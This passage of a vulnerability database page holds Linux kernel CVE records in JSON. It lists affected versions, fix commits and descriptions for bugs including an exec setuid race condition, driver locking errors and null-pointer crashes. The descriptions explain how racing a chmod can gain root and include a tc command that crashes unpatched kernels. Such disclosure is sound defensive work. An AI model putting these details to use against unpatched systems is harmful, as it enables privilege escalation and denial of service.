"versionType": "git"
},
{
"lessThan": "368f6985d46657b8b466a421dddcacd4051f7ada",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "15469d46ba34559bfe7e3de6659115778c624759",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "9b424c5d4130d56312e2a3be17efb0928fec4d64",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f6cfc6bcfd5e1cf76115b6450516ea4c99897ae1",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "d2a2a4714d80d09b0f8eb6438ab4224690b7121e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "90dfbba89ad4f0d9c9744ecbb1adac4aa2ff4f3e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f50733b45d865f91db90919f8311e2127ce5a0cb",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/exec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.106",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.47",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.106",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.47",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nexec: Fix ToCToU between perm check and set-uid/gid usage\n\nWhen opening a file for exec via do_filp_open(), permission checking is\ndone against the file\u0027s metadata at that moment, and on success, a file\npointer is passed back. Much later in the execve() code path, the file\nmetadata (specifically mode, uid, and gid) is used to determine if/how\nto set the uid and gid. However, those values may have changed since the\npermissions check, meaning the execution may gain unintended privileges.\n\nFor example, if a file could change permissions from executable and not\nset-id:\n\n---------x 1 root root 16048 Aug 7 13:16 target\n\nto set-id and non-executable:\n\n---S------ 1 root root 16048 Aug 7 13:16 target\n\nit is possible to gain root privileges when execution should have been\ndisallowed.\n\nWhile this race condition is rare in real-world scenarios, it has been\nobserved (and proven exploitable) when package managers are updating\nthe setuid bits of installed programs. Such files start with being\nworld-executable but then are adjusted to be group-exec with a set-uid\nbit. For example, \"chmod o-x,u+s target\" makes \"target\" executable only\nby uid \"root\" and gid \"cdrom\", while also becoming setuid-root:\n\n-rwxr-xr-x 1 root cdrom 16048 Aug 7 13:16 target\n\nbecomes:\n\n-rwsr-xr-- 1 root cdrom 16048 Aug 7 13:16 target\n\nBut racing the chmod means users without group \"cdrom\" membership can\nget the permission to execute \"target\" just before the chmod, and when\nthe chmod finishes, the exec reaches brpm_fill_uid(), and performs the\nsetuid to root, violating the expressed authorization of \"only cdrom\ngroup members can setuid to root\".\n\nRe-check that we still have execute permissions in case the metadata\nhas changed. It would be better to keep a copy from the perm-check time,\nbut until we can do that refactoring, the least-bad option is to do a\nfull inode_permission() call (under inode lock). It is understood that\nthis is safe against dead-locks, but hardly optimal."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:29.151Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d5c3c7e26275a2d83b894d30f7582a42853a958f"
},
{
"url": "https://git.kernel.org/stable/c/368f6985d46657b8b466a421dddcacd4051f7ada"
},
{
"url": "https://git.kernel.org/stable/c/15469d46ba34559bfe7e3de6659115778c624759"
},
{
"url": "https://git.kernel.org/stable/c/9b424c5d4130d56312e2a3be17efb0928fec4d64"
},
{
"url": "https://git.kernel.org/stable/c/f6cfc6bcfd5e1cf76115b6450516ea4c99897ae1"
},
{
"url": "https://git.kernel.org/stable/c/d2a2a4714d80d09b0f8eb6438ab4224690b7121e"
},
{
"url": "https://git.kernel.org/stable/c/90dfbba89ad4f0d9c9744ecbb1adac4aa2ff4f3e"
},
{
"url": "https://git.kernel.org/stable/c/f50733b45d865f91db90919f8311e2127ce5a0cb"
}
],
"title": "exec: Fix ToCToU between perm check and set-uid/gid usage",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43882",
"datePublished": "2024-08-21T00:10:49.556Z",
"dateReserved": "2024-08-17T09:11:59.287Z",
"dateUpdated": "2025-05-04T09:28:29.151Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42268 (GCVE-0-2024-42268)
Vulnerability from cvelistv5
Published
2024-08-17 08:54
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/mlx5: Fix missing lock on sync reset reload
On sync reset reload work, when remote host updates devlink on reload
actions performed on that host, it misses taking devlink lock before
calling devlink_remote_reload_actions_performed() which results in
triggering lock assert like the following:
WARNING: CPU: 4 PID: 1164 at net/devlink/core.c:261 devl_assert_locked+0x3e/0x50
…
CPU: 4 PID: 1164 Comm: kworker/u96:6 Tainted: G S W 6.10.0-rc2+ #116
Hardware name: Supermicro SYS-2028TP-DECTR/X10DRT-PT, BIOS 2.0 12/18/2015
Workqueue: mlx5_fw_reset_events mlx5_sync_reset_reload_work [mlx5_core]
RIP: 0010:devl_assert_locked+0x3e/0x50
…
Call Trace:
<TASK>
? __warn+0xa4/0x210
? devl_assert_locked+0x3e/0x50
? report_bug+0x160/0x280
? handle_bug+0x3f/0x80
? exc_invalid_op+0x17/0x40
? asm_exc_invalid_op+0x1a/0x20
? devl_assert_locked+0x3e/0x50
devlink_notify+0x88/0x2b0
? mlx5_attach_device+0x20c/0x230 [mlx5_core]
? __pfx_devlink_notify+0x10/0x10
? process_one_work+0x4b6/0xbb0
process_one_work+0x4b6/0xbb0
[…]
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42268",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:12:21.113332Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:32.805Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5d07d1d40aabfd61bab21115639bd4f641db6002",
"status": "affected",
"version": "84a433a40d0ebf3bbf36b8bfa58c6f45dc782344",
"versionType": "git"
},
{
"lessThan": "98884e89c90d077f6fe6ba18e6cf6f914642f04e",
"status": "affected",
"version": "84a433a40d0ebf3bbf36b8bfa58c6f45dc782344",
"versionType": "git"
},
{
"lessThan": "091268f3c27a5b6d7858a3bb2a0dbcc9cd26ddb5",
"status": "affected",
"version": "84a433a40d0ebf3bbf36b8bfa58c6f45dc782344",
"versionType": "git"
},
{
"lessThan": "572f9caa9e7295f8c8822e4122c7ae8f1c412ff9",
"status": "affected",
"version": "84a433a40d0ebf3bbf36b8bfa58c6f45dc782344",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlx5/core/fw_reset.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.45",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.104",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.45",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.4",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5: Fix missing lock on sync reset reload\n\nOn sync reset reload work, when remote host updates devlink on reload\nactions performed on that host, it misses taking devlink lock before\ncalling devlink_remote_reload_actions_performed() which results in\ntriggering lock assert like the following:\n\nWARNING: CPU: 4 PID: 1164 at net/devlink/core.c:261 devl_assert_locked+0x3e/0x50\n\u2026\n CPU: 4 PID: 1164 Comm: kworker/u96:6 Tainted: G S W 6.10.0-rc2+ #116\n Hardware name: Supermicro SYS-2028TP-DECTR/X10DRT-PT, BIOS 2.0 12/18/2015\n Workqueue: mlx5_fw_reset_events mlx5_sync_reset_reload_work [mlx5_core]\n RIP: 0010:devl_assert_locked+0x3e/0x50\n\u2026\n Call Trace:\n \u003cTASK\u003e\n ? __warn+0xa4/0x210\n ? devl_assert_locked+0x3e/0x50\n ? report_bug+0x160/0x280\n ? handle_bug+0x3f/0x80\n ? exc_invalid_op+0x17/0x40\n ? asm_exc_invalid_op+0x1a/0x20\n ? devl_assert_locked+0x3e/0x50\n devlink_notify+0x88/0x2b0\n ? mlx5_attach_device+0x20c/0x230 [mlx5_core]\n ? __pfx_devlink_notify+0x10/0x10\n ? process_one_work+0x4b6/0xbb0\n process_one_work+0x4b6/0xbb0\n[\u2026]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:34.160Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/5d07d1d40aabfd61bab21115639bd4f641db6002"
},
{
"url": "https://git.kernel.org/stable/c/98884e89c90d077f6fe6ba18e6cf6f914642f04e"
},
{
"url": "https://git.kernel.org/stable/c/091268f3c27a5b6d7858a3bb2a0dbcc9cd26ddb5"
},
{
"url": "https://git.kernel.org/stable/c/572f9caa9e7295f8c8822e4122c7ae8f1c412ff9"
}
],
"title": "net/mlx5: Fix missing lock on sync reset reload",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42268",
"datePublished": "2024-08-17T08:54:23.624Z",
"dateReserved": "2024-07-30T07:40:12.259Z",
"dateUpdated": "2025-05-04T09:25:34.160Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43909 (GCVE-0-2024-43909)
Vulnerability from cvelistv5
Published
2024-08-26 10:11
Modified
2025-05-21 09:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu/pm: Fix the null pointer dereference for smu7
optimize the code to avoid pass a null pointer (hwmgr->backend)
to function smu7_update_edc_leakage_table.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43909",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:28:23.753740Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:07.299Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "37b9df457cbcf095963d18f17d6cb7dfa0a03fce",
"status": "affected",
"version": "599a7e9fe1b683d04f889d68f866f5548b1e0239",
"versionType": "git"
},
{
"lessThan": "1b8aa82b80bd947b68a8ab051d960a0c7935e22d",
"status": "affected",
"version": "599a7e9fe1b683d04f889d68f866f5548b1e0239",
"versionType": "git"
},
{
"lessThan": "09544cd95c688d3041328a4253bd7514972399bb",
"status": "affected",
"version": "599a7e9fe1b683d04f889d68f866f5548b1e0239",
"versionType": "git"
},
{
"lessThan": "7f56f050f02c27ed89cce1ea0c04b34abce32751",
"status": "affected",
"version": "599a7e9fe1b683d04f889d68f866f5548b1e0239",
"versionType": "git"
},
{
"lessThan": "c02c1960c93eede587576625a1221205a68a904f",
"status": "affected",
"version": "599a7e9fe1b683d04f889d68f866f5548b1e0239",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.9"
},
{
"lessThan": "4.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.105",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.46",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.105",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.46",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.5",
"versionStartIncluding": "4.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amdgpu/pm: Fix the null pointer dereference for smu7\n\noptimize the code to avoid pass a null pointer (hwmgr-\u003ebackend)\nto function smu7_update_edc_leakage_table."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:13:07.433Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/37b9df457cbcf095963d18f17d6cb7dfa0a03fce"
},
{
"url": "https://git.kernel.org/stable/c/1b8aa82b80bd947b68a8ab051d960a0c7935e22d"
},
{
"url": "https://git.kernel.org/stable/c/09544cd95c688d3041328a4253bd7514972399bb"
},
{
"url": "https://git.kernel.org/stable/c/7f56f050f02c27ed89cce1ea0c04b34abce32751"
},
{
"url": "https://git.kernel.org/stable/c/c02c1960c93eede587576625a1221205a68a904f"
}
],
"title": "drm/amdgpu/pm: Fix the null pointer dereference for smu7",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43909",
"datePublished": "2024-08-26T10:11:12.654Z",
"dateReserved": "2024-08-17T09:11:59.293Z",
"dateUpdated": "2025-05-21T09:13:07.433Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48645 (GCVE-0-2022-48645)
Vulnerability from cvelistv5
Published
2024-04-28 13:00
Modified
2025-05-04 08:20
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: enetc: deny offload of tc-based TSN features on VF interfaces
TSN features on the ENETC (taprio, cbs, gate, police) are configured
through a mix of command BD ring messages and port registers:
enetc_port_rd(), enetc_port_wr().
Port registers are a region of the ENETC memory map which are only
accessible from the PCIe Physical Function. They are not accessible from
the Virtual Functions.
Moreover, attempting to access these registers crashes the kernel:
$ echo 1 > /sys/bus/pci/devices/0000\:00\:00.0/sriov_numvfs
pci 0000:00:01.0: [1957:ef00] type 00 class 0x020001
fsl_enetc_vf 0000:00:01.0: Adding to iommu group 15
fsl_enetc_vf 0000:00:01.0: enabling device (0000 -> 0002)
fsl_enetc_vf 0000:00:01.0 eno0vf0: renamed from eth0
$ tc qdisc replace dev eno0vf0 root taprio num_tc 8 map 0 1 2 3 4 5 6 7 \
queues 1@0 1@1 1@2 1@3 1@4 1@5 1@6 1@7 base-time 0 \
sched-entry S 0x7f 900000 sched-entry S 0x80 100000 flags 0x2
Unable to handle kernel paging request at virtual address ffff800009551a08
Internal error: Oops: 96000007 [#1] PREEMPT SMP
pc : enetc_setup_tc_taprio+0x170/0x47c
lr : enetc_setup_tc_taprio+0x16c/0x47c
Call trace:
enetc_setup_tc_taprio+0x170/0x47c
enetc_setup_tc+0x38/0x2dc
taprio_change+0x43c/0x970
taprio_init+0x188/0x1e0
qdisc_create+0x114/0x470
tc_modify_qdisc+0x1fc/0x6c0
rtnetlink_rcv_msg+0x12c/0x390
Split enetc_setup_tc() into separate functions for the PF and for the
VF drivers. Also remove enetc_qos.o from being included into
enetc-vf.ko, since it serves absolutely no purpose there.
References
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T15:17:55.608Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/510e703e4ed0e011db860bc21228aff48fc9eea7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/23022b74b1a23bed044f6bc96cf92f6ca5f3e75f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5641c751fe2f92d3d9e8a8e03c1263ac8caa0b42"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48645",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:46:14.504061Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:10.975Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/freescale/enetc/Makefile",
"drivers/net/ethernet/freescale/enetc/enetc.c",
"drivers/net/ethernet/freescale/enetc/enetc.h",
"drivers/net/ethernet/freescale/enetc/enetc_pf.c",
"drivers/net/ethernet/freescale/enetc/enetc_vf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "510e703e4ed0e011db860bc21228aff48fc9eea7",
"status": "affected",
"version": "34c6adf1977b611fca3b824ad12a2a415e1e420e",
"versionType": "git"
},
{
"lessThan": "23022b74b1a23bed044f6bc96cf92f6ca5f3e75f",
"status": "affected",
"version": "34c6adf1977b611fca3b824ad12a2a415e1e420e",
"versionType": "git"
},
{
"lessThan": "5641c751fe2f92d3d9e8a8e03c1263ac8caa0b42",
"status": "affected",
"version": "34c6adf1977b611fca3b824ad12a2a415e1e420e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/freescale/enetc/Makefile",
"drivers/net/ethernet/freescale/enetc/enetc.c",
"drivers/net/ethernet/freescale/enetc/enetc.h",
"drivers/net/ethernet/freescale/enetc/enetc_pf.c",
"drivers/net/ethernet/freescale/enetc/enetc_vf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.71",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.19.*",
"status": "unaffected",
"version": "5.19.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.0",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.71",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.19.12",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.0",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: enetc: deny offload of tc-based TSN features on VF interfaces\n\nTSN features on the ENETC (taprio, cbs, gate, police) are configured\nthrough a mix of command BD ring messages and port registers:\nenetc_port_rd(), enetc_port_wr().\n\nPort registers are a region of the ENETC memory map which are only\naccessible from the PCIe Physical Function. They are not accessible from\nthe Virtual Functions.\n\nMoreover, attempting to access these registers crashes the kernel:\n\n$ echo 1 \u003e /sys/bus/pci/devices/0000\\:00\\:00.0/sriov_numvfs\npci 0000:00:01.0: [1957:ef00] type 00 class 0x020001\nfsl_enetc_vf 0000:00:01.0: Adding to iommu group 15\nfsl_enetc_vf 0000:00:01.0: enabling device (0000 -\u003e 0002)\nfsl_enetc_vf 0000:00:01.0 eno0vf0: renamed from eth0\n$ tc qdisc replace dev eno0vf0 root taprio num_tc 8 map 0 1 2 3 4 5 6 7 \\\n\tqueues 1@0 1@1 1@2 1@3 1@4 1@5 1@6 1@7 base-time 0 \\\n\tsched-entry S 0x7f 900000 sched-entry S 0x80 100000 flags 0x2\nUnable to handle kernel paging request at virtual address ffff800009551a08\nInternal error: Oops: 96000007 [#1] PREEMPT SMP\npc : enetc_setup_tc_taprio+0x170/0x47c\nlr : enetc_setup_tc_taprio+0x16c/0x47c\nCall trace:\n enetc_setup_tc_taprio+0x170/0x47c\n enetc_setup_tc+0x38/0x2dc\n taprio_change+0x43c/0x970\n taprio_init+0x188/0x1e0\n qdisc_create+0x114/0x470\n tc_modify_qdisc+0x1fc/0x6c0\n rtnetlink_rcv_msg+0x12c/0x390\n\nSplit enetc_setup_tc() into separate functions for the PF and for the\nVF drivers. Also remove enetc_qos.o from being included into\nenetc-vf.ko, since it serves absolutely no purpose there."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:20:23.337Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/510e703e4ed0e011db860bc21228aff48fc9eea7"
},
{
"url": "https://git.kernel.org/stable/c/23022b74b1a23bed044f6bc96cf92f6ca5f3e75f"
},
{
"url": "https://git.kernel.org/stable/c/5641c751fe2f92d3d9e8a8e03c1263ac8caa0b42"
}
],
"title": "net: enetc: deny offload of tc-based TSN features on VF interfaces",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48645",
"datePublished": "2024-04-28T13:00:11.615Z",
"dateReserved": "2024-02-25T13:44:28.316Z",
"dateUpdated": "2025-05-04T08:20:23.337Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43849 (GCVE-0-2024-43849)
Vulnerability from cvelistv5
Published
2024-08-17 09:22
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
soc: qcom: pdr: protect locator_addr with the main mutex
If the service locator server is restarted fast enough, the PDR can
rewrite locator_addr fields concurrently. Protect them by placing
modification of those fields under the main pdr->lock.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f Version: fbe639b44a82755d639df1c5d147c93f02ac5a0f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43849",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:30.525809Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:21.452Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/soc/qcom/pdr_interface.c"
],
